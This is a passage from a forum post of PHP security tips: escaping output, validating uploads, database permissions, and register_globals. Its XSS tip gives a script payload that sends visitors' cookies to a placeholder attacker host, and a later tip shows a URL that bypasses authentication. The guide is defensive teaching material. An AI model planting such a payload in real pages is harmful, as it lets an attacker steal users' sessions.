If you display the raw user input on a web page this will be very ugly, it can even be worse if a user inputs this code instead:
Code:
<script>document.location.replace('http://attacker/?c='+document.cookie);</script>
With this, an attacker can steal cookies from whoever visits that certain page (containing bio etc.) and this includes session cookies with session IDs in them so the attacker can hijack your users' sessions and appear to be logged in as other users.
When displaying user input on a page use htmlentities($user_bio, ENT_QUOTES, 'UTF-8');
6. When uploading files, validate the file mime type
If you are expecting images, make sure the file you are receiving is an image or it might be a PHP script that can run on your server and does whatever damage you can imagine.
One quick way is to check the file extension:
PHP Code:
$valid_extensions = array('jpg', 'gif', 'png'); // ...
$file_name = basename($_FILES['userfile']['name']);
$_file_name = explode('.', $file_name);
$ext = $_file_name[ count($_file_name) - 1 ];
if( !in_array($ext, $valid_extensions) ) {
/* This file is invalid */
}
Note that validating extension is a very simple way, and not the best way, to validate file uploads but it's effective;
simply because unless you have set your server to interpret .jpg files as PHP scripts then you are fine.
7. If you are using 3rd party code libraries, be sure to keep them up to date
If you are using code libraries like Smarty or ADODB etc. be sure to always download the latest version.
8. Give your database users just enough permissions
If a database user is never going to drop tables, then when creating that user don't give it drop table permissions, normally just SELECT, UPDATE, DELETE, INSERT should be enough.
9. Do not allow hosts other than localhost to connect to your database
If you need to, add only that particular host or IP as necessary but never, ever let everyone connect to your database server.
10. Your library file extensions should be PHP
.inc files will be written to the browser just like text files (unless your server is setup to interpret them as PHP scripts), users will be able to see your messy code (kidding ) and possibly find exploits or see your passwords etc.
Have extensions like config.inc.php or have a .htaccess file in your extension (templates, libs etc.) folders with this one line:
Code:
deny from all
11. Have register globals off or define your variables first
Register globals can be very dangerous, consider this bit of code:
PHP Code:
if( user_logged_in() ) {
$auth = true;
}
if( $auth ) {
/* Do some admin stuff */
}
Now with register globals on an attacker can view this page like this and bypass your authentication:
http://yourwebsite.com/admin.php?auth=1
If you have registered globals on and you can't turn it off for some reason you can fix these issues by defining your variables first:
PHP Code:
$auth = false;
if( user_logged_in() ) {
$auth = true;
}
if( $auth ) {
/* Do some admin stuff */
}
Defining your variables first is a good programming practice that I suggest you follow anyway.
12. Keep PHP itself up to date
Just take a look at www.php.net and see release announcements and note how many security issues they fix on every release to understand why this is important.
13. Read security books
Always find new books about PHP security to read; you can start by reading the 4th book in the PHP Thread, which is one of the best books on PHP security and the author is a member of the PHP team so he knows the internals very well.
14. Contribute to this list
Feel free to reply to this thread and add to this list, it will be helpful for everyone!
software development companyhttp://www.infysolutions.com
